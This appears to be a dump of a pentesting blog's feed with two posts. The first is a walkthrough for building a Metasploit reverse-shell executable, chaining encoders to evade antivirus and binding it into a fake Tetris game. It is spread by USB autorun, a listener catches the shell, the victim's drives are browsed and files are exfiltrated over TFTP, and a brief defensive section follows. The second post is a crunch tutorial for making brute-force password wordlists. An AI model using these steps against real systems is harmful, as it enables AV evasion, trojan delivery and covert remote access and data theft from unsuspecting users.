more to be added..please leave a comment if you have a link to helpful info.Unknownnoreply@blogger.com10tag:blogger.com,1999:blog-8356530514965708840.post-81466030721557956552010-05-31T15:48:00.286+02:002011-04-28T01:02:55.493+02:00Creating an executable with Metasploit and gaining access to target PCMy goal for this project was to create a reverse_tcp payload and have this executed on the target pc, byassing the installed antivirus and giving full access to the target pc.<br />
<br />
This of course based on being on the network and having a valid IP address. <br />
<br />
<br />
<div style="color: yellow;">Target PC</div><div style="color: yellow;">-----------</div>- Windows XP Home SP3 Fully Patched<br />
(also tested on Windows XP Profressional SP 3 fully patched) <br />
- AntiVirus fully upto date<br />
- Running Windows Firewall only<br />
<br />
I more or less got where I wanted to be, but had trouble getting any meterpreter payloads passed AntiVirus.<br />
<b><i>EDIT</i></b><br />
<b><i>-------</i></b><br />
<i>I did finally manage to get meterpreter past the AV, it is indeed a matter of trying different variations/combinations of various encoders.</i><br />
<br />
Steps taken were as follows ;<br />
> Create an exe file with msfpayload that will create a reverse_tcp connection which will try to connect back to<br />
the 'attackers' machine.<br />
> Use various encoding methods on the exe with msfencode to make the file less obvious to AV<br />
<br />
> Use some social engineering to get the target to run my executable.<br />
<br />
Although AntiVirus now mostly pick up the metasploit payloads, the methods and encoding are evolving and it is interesting to see the methods involved.<br />
I have experienced that the windows/meterpreter/reverse_tcp payloads are more frequently detected than the windows/shell/reverse_tcp payload. <br />
<br />
Different combinations of encoding may help, a bit of trial and error required !<br />
<br />
<br />
PAYLOAD<br />
-------------<br />
<span style="color: yellow;">windows/shell/reverse_tcp</span> the payload<br />
<span style="color: yellow;">LHOST=192.168.1.105</span> the local IP the payload will try to connect back to<br />
<span style="color: yellow;">LPORT=5632</span> the local port the connection will be listening on<br />
<span style="color: yellow;">R </span> the command to tell msfpayload to output as raw data<br />
<br />
<br />
ENCODING<br />
<i>./msfencode -h for options </i><br />
<i>./msfencode -l to list available encoders</i><br />
----------------------------------------<br />
<span style="color: yellow;">-e</span> to specify the encoder to use<br />
<span style="color: yellow;">-c</span> to specify the number of times to encode the data<br />
<span style="color: yellow;">-t</span> to specify the format (in this example <span style="color: yellow;">raw </span>and for the final step <span style="color: yellow;">exe</span>) <br />
<span style="color: yellow;">-x</span> to specify the win32 exe template to use<br />
<br />
I am using the backslash <span style="color: lime;">\</span> so I can continue the code on another line for clarity's sake. <br />
I have copied notepad.exe (from C:\WINDOWS\system32\) to the framework3 directory.<br />
<br />
<div style="color: lime;">cd /pentest/exploits/framework3/</div><div style="color: lime;"></div><div style="color: lime;">./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | \</div><div style="color: lime;"></div><div style="color: lime;">./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \<br />
./msfencode -e x86/countdown -c 2 -t raw | \</div><div style="color: lime;"></div><div style="color: lime;">./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \</div><div style="color: lime;"></div><div style="color: lime;">./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o payload.exe</div><div style="color: lime;">ls -la | grep exe </div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="441" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf01.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
In combination with the <span style="color: yellow;">-x</span> command in msfencode, you can also add the <span style="color: yellow;">-k</span> option which will run the template exe in a new thread.<br />
(So if included in the above example, would also open notepad.exe on the victim's pc when the payload is run).<br />
This does however change the size of the executable from the original legitimate executable and may give AV more cause to flag the exe file as suspicious. <br />
In this case I have opted to not use the -k option to keep the file sizes identical.<br />
<br />
So how did we do concerning the antivirus detection ? <br />
<div style="color: red;"><i>If you upload the payload to for instance VirusTotal.com for verification, you have an excellent chance that the file signatures will be forwarded to various AV vendors and updated accordingly in as quick as a day or two.. rendering that particular file / encoding useless..</i></div><br />
To test this case, I simply ensured that virus definitions were updated on the system and ran the AV scans locally.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/avg-scan.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="476" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/avg-scan.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/clamwin-result.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/clamwin-result.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So far so good.. !<br />
<br />
<br />
Now a bit of Social Engineering based on the inherent curiosity and playfulness of mankind ..<br />
to get the executable run on the target pc.<br />
<br />
There are several ways to do this, in this case my method was as follows ;<br />
> Renamed the payload.exe to tetris.exe<br />
> Binding the tetris.exe with an exe which runs a tetris game, named the new exe <i>Tetris.exe</i><br />
<i>Using <b style="color: yellow;">IExpress</b> (readily installed on Win XP) to package the 2 executables.</i><br />
> Replaced the icon of the tetris.exe (with payload) with the original icon extracted from the original executable.<br />
<i> Used <b style="color: yellow;">IcoFX</b> for both the extraction and replacing of the icons.</i><br />
> Renamed a USB flash drive to <i>TETRIS</i>, saved the tetris.exe to root of the usb drive.<br />
> Created an autorun file to open up the Tetris.exe on insertion and saved to root of the usb drive<br />
(only works if autorun enabled of course)<br />
<br />
Something similar can also be done with a U3 USB flash drive;<br />
> Using <i><b style="color: yellow;">Universal Customizer</b></i> create a custom ISO image (ISOCreate.cmd) containing exe and autorun.inf file.<br />
> Run the Universal Customizer to have the standard U3 ISO replaced with the custom ISO.<br />
Now when placed in a PC with autorun enabled, there is no interaction needed to start the exe file. <br />
(So could simply place the payload in the iso section and be done with it, but where's the fun in that ?!)<br />
<br />
<br />
Now we start listening for possible incoming connections on the 'attacker' pc, hand out the USB to possible target and wait.<br />
<br />
To start listening for incoming connections you can either use the msfconsole or msfcli,<br />
I will use msfcli ;<br />
<div style="color: lime;">cd /pentest/exploits/framework3/</div><div style="color: lime;">./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp \<br />
LHOST=192.168.1.100 LPORT=5632 E</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="268" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf04.jpg" width="640" /></a></div><br />
<br />
<br />
When the USB is plugged in it will open the usual menu (if autorun enabled) asking if you would like to<br />
open the folder or open the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/autorun-menu.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/autorun-menu.jpg" width="302" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<i>With the U3 USB flashdrive method, it will open the Tetris.exe file directly (if autorun enabled).</i><br />
<br />
Wait for target to play the game, sit back and wait for them to close the game so the payload will be executed.<br />
(The options in IExpress need one program to be run before the other)<br />
<br />
<br />
When that happens, you should get a shell and it is basically Game Over for the victim.<br />
<br />
Listing all drives ;<br />
<div style="color: lime;">fsutil fsinfo drives</div>Check what type of drive it is;<br />
<span style="color: lime;">fsutil fsinfo drivetype D:</span><br />
Just to get the info of a drive;<br />
<div style="color: lime;">fsutil fsinfo volumeinfo D:\</div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf02A.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="442" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf02A.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Of course there are a myriad of options to use to check information on the drives.<br />
<br />
Using the usual to get drive names / labels and list of fiolders / files<br />
<div style="color: lime;">dir C:\</div><div style="color: lime;">dir D:\</div><div style="color: lime;">dir E:\</div><br />
For a more targeted listing, go to directory of interest and list based on filetype; doc / zip / jpg / avi / etc etc<br />
<span style="color: lime;">dir /s/p/b \*.avi</span> <br />
<br />
<br />
<br />
To enable downloading and uploading in the shell you can use TFTPD.<br />
Start TFTPD on your backtrack machine<br />
(K Menu -- Services -- TFTP -- Start TFTPD) <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf05.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To 'download' from the victim machine ;<br />
<span style="color: lime;">tftp -i 192.168.1.105 put filename</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="442" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf06.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf07.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To 'upload' to the victim machine<br />
<span style="color: lime;">tftp -i 192.168.1.105 get filename</span> (from backtrack directory /tmp/)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="442" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf08.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;"><b>So how to protect against such intrusions ? </b></div>======================================<br />
<br />
<div style="color: red;">Turn autorun off on your windows system </div>The below link gives information on how to do this on multiple systems.<br />
<a href="http://support.microsoft.com/kb/967715/en-us">Disable the Autorun functionality in Windows</a><br />
Of course it goes without saying that you should always be careful of what you plug into and run on your system, but truth be told, we all actually have done this at one time and one doesnt always have a virtual machine handy to test the process out on first..<br />
<br />
<div style="color: red;">Ensure AntiVirus deifinitions are uptodate</div>Although in this example the exe bypassed the AV, it will not do so for long, its only a matter of time before<br />
AV picks up on the signature, so always make sure your AV definitions are upto date.<br />
<br />
<div style="color: red;">Run a firewall that monitors <b>outgoing</b> connections in addition to <b>incoming </b>connections.</div>Having a firewall installed that monitors <b>outgoing</b> connections would have prevented the reverse_tcp session from getting out without any notifications.<br />
Windows firewall only monitors <b>incoming</b> connections, so having the reverse_tcp connecting out from the victim system does not raise any alarms. <br />
<br />
ZoneAlarm Firewall for instance will popup and advise that ***.exe is trying to connect to ***.<br />
That should set a few alarms off with the user.<br />
<br />
<br />
<div style="color: yellow;">Linkage on the information and the tools used ;</div>========================================<br />
<br />
Video by IronGeek on the packaging of executables with IExpress.<br />
<a href="http://www.blogger.com/%20http://www.irongeek.com/i.php?page=videos/binders-iexpress-trojans"> http://www.irongeek.com/i.php?page=videos/binders-iexpress-trojans</a><br />
<br />
IcoFX Homepage<br />
<a href="http://icofx.ro/">http://icofx.ro/</a><br />
<br />
Univeral Customizer information<br />
<a href="http://www.hak5.org/w/index.php/Universal_U3_LaunchPad_Hacker">http://www.hak5.org/w/index.php/Universal_U3_LaunchPad_Hacker</a><br />
<br />
<br />
<div style="color: yellow;"><b>A video showing the process as described above but with some slight changes</b></div><div style="color: yellow;"><b>as regarding a meterpreter session and using a different exe as template.</b></div><br />
<a href="http://blip.tv/file/3741812"><b>http://blip.tv/file/3741812</b></a><br />
<br />
<b>or</b><br />
<b> </b><br />
<a href="http://vimeo.com/12484065"><b>http://vimeo.com/12484065</b></a><br />
<b> </b><br />
<b>or</b><br />
<b> </b><br />
<b><a href="http://www.youtube.com/watch?v=C0px_dczD6I">http://www.youtube.com/watch?v=C0px_dczD6I</a></b><br />
<b> </b><br />
<b> </b>Unknownnoreply@blogger.com11tag:blogger.com,1999:blog-8356530514965708840.post-51238712243545334512010-04-02T20:37:00.117+02:002011-06-12T23:55:19.391+02:00Creating wordlists with crunch v2.4<div style="color: red;"><b>Edit 12-06-2011</b></div><div style="color: red;"><b>crunch v3.0 is now included in the BT repositories, </b><br />
<b>v3.0 has many big fixes and additional functionality, some items/switches have however been altered.</b><br />
<b>Therefor, this post is superceded by ; </b></div><b><a href="http://adaywithtape.blogspot.com/2011/05/creating-wordlists-with-crunch-v30.html">http://adaywithtape.blogspot.com/2011/05/creating-wordlists-with-crunch-v30.html</a></b><br />
<br />
<br />
crunch is an invaluable tool for quickly (well.. depending on the size of wordlist..) creating bruteforce wordlists.<br />
<br />
The latest version released recently is v2.4 and compared with the release currently installed with backtrack 4 (v2.0) comes with some very cool additions. <br />
<i>The version of crunch in backtrack 4 repositories is expected to be updated within a few days to crunch v2.4</i><br />
<i><b>Edit dd 03-07-2010 -- Crunch 2.4 is finally included in latest updates !</b></i><br />
<br />
crunch is one of the first tools that come to mind when needing to create a bruteforce wordlist and since it has been modified so heavily since I first stumbled on it with backtrack 3, I figured it was time for a full and comprehensive testing, to be able get to grips with all the latest goodness in it !<br />
<br />
The default path for crunch v2.4 in backtrack 4 is;<br />
<b>/pentest/passwords/crunch/</b><br />
<br />
<br />
crunch's output is printed to screen when no -o option is given to write to file, so you can easily check to see if it is doing what you wanted.<br />
It can also be piped through to additional programs such as aircrack or cowpatty.<br />
<br />
general usage is ;<br />
<br />
<div style="color: yellow;">./crunch <min length=""><max length=""><min-length><max-length><min length=""><max length="">[minlength] [maxlength] [charset] -o wordlist.txt</max></min></max-length></min-length></max></min></div><br />
NOTE:<br />
It is close to impossible to stop crunch to still show the command given, so the below pics are images of <b>part</b> of the output from the given command..<br />
<br />
<div style="color: yellow;">BASIC USAGE & CHARACTER SETS</div><div style="color: yellow;">==============================</div><br />
If no character set is defined, crunch defaults to using lower case alpha only ;<br />
<br />
<div style="color: lime;">./crunch 4 4</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/no-char-set.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/no-char-set.jpg" width="640" /></a></div><br />
<br />
The charset can be entered manually in the command line ; <br />
<br />
<div style="color: lime;">./crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CHARANDNUMB.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CHARANDNUMB.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
The output can also be inverted using the -i option.<br />
<br />
So as opposed to ;<br />
<br />
<div style="color: lime;">./crunch 4 4 ABCDEFG </div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Using the -i option will invert the direction when making the wordlist from left-to-right to right-to-left ;<br />
<div style="color: lime;">./crunch 4 4 ABCDEFG -i </div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i-1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or a charset can be chosen from the charset.lst file which saves on the typing (and typoes..) when dealing with normal ranges of letters, numbers and symbols.<br />
<span style="color: yellow;">charset.lst <i>(included in the crunch installation package) ;</i></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="426" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha-numeric</div><br />
The output using charsets can also be inverted using the -i option.<br />
<br />
<br />
<br />
<div style="color: yellow;">CREATING CUSTOM PATTERNS</div><div style="color: yellow;">==========================</div><br />
The great thing about crunch is the ability to create patterns with the -t option, this function has been greatly improved with crunch v2.3 and now offers many more possibilities than before. <br />
<br />
<br />
To create a wordlist with a prefix of 'dog' followed by the characters in a chosen charset ;<br />
<div style="color: lime;">./crunch 6 6 -f charset.lst lalpha -t dog@@@</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-dogaaa.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-dogaaa.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or having 'dog' appended to the end of the chosen charset ;<br />
<div style="color: lime;">./crunch 6 6 -f charset.lst lalpha -t @@@dog</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aaadog.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aaadog.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or to have 'dog' bang in the middle ;<br />
<div style="color: lime;">./crunch 7 7 -f charset.lst lalpha -t @@dog@@</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aadogaa.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aadogaa.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
In this latest version of crunch it is also possible to create a pattern, specifying where you want<br />
characters / numbers / symbols<br />
which can really be handy in reducing the overall size of the wordlist if you know there is a certain pattern involved; <br />
<br />
<div style="color: lime;">./crunch 6 6 -f charset.lst mixalpha -t @dog%^</div>In the above example ;<br />
<span style="color: yellow;">@</span> --> will read and print from the specified character set only.<br />
<span style="color: yellow;">%</span> --> will print numeric values only.<br />
<span style="color: yellow;">^</span> --> will print symbols/special characters only, including space.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-adogns.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-adogns.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
This feature opens up easier and powerful options for creating lists with certain patterns of special characters or numbers;<br />
<br />
For a 4 character wordlist containing only special characters.<br />
<div style="color: lime;">./crunch 4 4 -t ^^^^</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-symbol.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-symbol.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
For a 4 character wordlist containing numbers and special characters in the sequence; 1$1$<br />
<div style="color: lime;">./crunch 4 4 -t %^%^</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-nsns.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-nsns.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
For a 4 letter wordlist containing characters and numbers in the sequence; a1a1<br />
<div style="color: lime;">./crunch 4 4 -t @%@%</div><i>Note that if no character set is defined, crunch defaults to lower case alpha character set when using @ </i><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-anan.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-anan.jpg" width="640" /></a></div><br />
<br />
<br />
For a 4 letter wordlist containing characters from a character set and special characters in the sequence A$A$<br />
<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha-numeric-space -t @^@^</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-asas.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-asas.jpg" width="640" /></a></div><br />
<br />
Character sets to use for the -t option can also be specified ; <br />
<br />
To use ;<br />
<span style="color: yellow;">ABCD</span> as characters<br />
<span style="color: yellow;">1234</span> as numeric values<br />
<span style="color: yellow;">@#$%</span> as symbols<br />
<br />
<div style="color: lime;">./crunch 6 6 -t @dog%^ ABCD 1234 @#$%</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset1.jpg" width="640" /></a></div><br />
or<br />
<br />
<div style="color: lime;">./crunch 7 7 -t ^@dog%@ ABCD 1234 @#$%</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset2.jpg" width="640" /></a></div><br />
<br />
<br />
Note that when specifying character sets like this for use with the -t option, the sequence of the character set specification <b>must </b>be;<br />
alpha -- numeric -- symbols<br />
<br />
Some special characters need escaping, to do this make sure a backslash <span style="color: red;">\</span> is placed before the character to escape, so for instance using the above example, but requiring a symbol charset of ;<br />
<div style="color: yellow;">!()& </div><br />
<div style="color: lime;">./crunch 6 6 -t @dog%^ ABCD 1234 <span style="color: red;">\</span>!<span style="color: red;">\</span>(<span style="color: red;">\</span>)<span style="color: red;">\</span>&</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/escaping.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/escaping.jpg" width="640" /></a></div><br />
<br />
<br />
<div style="color: #6aa84f;"><br />
<br />
<br />
<div style="color: yellow;">STRING PERMUTATIONS</div></div><div style="color: yellow;">====================</div><br />
Crunch also now has the possibility to generate permutations instead of combinations on either strings of characters or words. <br />
<br />
To generate permutations on characters, specify with the -p option, fun for anagrams !<br />
(although crunch then ignores min and max length, you do still need to enter them) <br />
<br />
<div style="color: lime;">./crunch 1 1 -p dog</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-p.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-p.jpg" width="640" /></a></div><br />
<br />
<br />
To generate permutations on words/strings, specify same with the -m option,<br />
(again, although the min and max length is ignored, it does need to be entered) <br />
The -m option does not (yet) have the capability to read from file, this however, has been placed in the author's to-do list.<br />
<br />
<div style="color: lime;">./crunch 1 1 -m cat dog pig</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-m.jpg" width="640" /></a></div><br />
<br />
<br />
<div style="color: #6aa84f;"><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;"><br />
</div><div style="color: yellow;">OUTPUT OPTIONS</div></div><div style="color: yellow;">===============</div><br />
Resulting output from crunch can also be split in various sizes, based on either line count or on actual size and can also be compressed.<br />
<br />
<br />
To split the output based on line count, use the -c option combined with -o START ; <br />
<br />
<span style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o START -c 100000</span> <br />
The above will result in files being created containing no more than 100000 words (lines). <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-c-1k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-c-1k.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Output files can be split into files of a certain maximum size using the -b option combined with -o START.<br />
The size definition can be; kb, mb, gb or kib, mib, gib<br />
kb, mb, and gb are based on the power of 10 (i.e. 1KB = 1000 bytes)<br />
kib, mib, and gib are based on the power of 2 (i.e. 1KB = 1024 bytes). <br />
<br />
Creating files no larger than 500kb :<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o START -b 500kb</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-500k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-500k.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Creating files no larger than 1mb :<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o START -b 1mb</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-1mb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-1mb.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
Output files can also be compressed with the -z option, using either bzip, gzip or lzma<br />
<br />
<span style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o wordlist -z gzip</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot02-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="243" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot02-1.jpg" width="640" /></a></div><br />
<br />
<br />
A resume function is also built-in with the -r option;<br />
After cancelling the build of the wordlist, the exact same syntax must be used again followed with the -r option ; <br />
<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha -o wordlist.txt </div><div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha -o wordlist.txt -r</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-r.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-r.jpg" width="640" /></a></div><br />
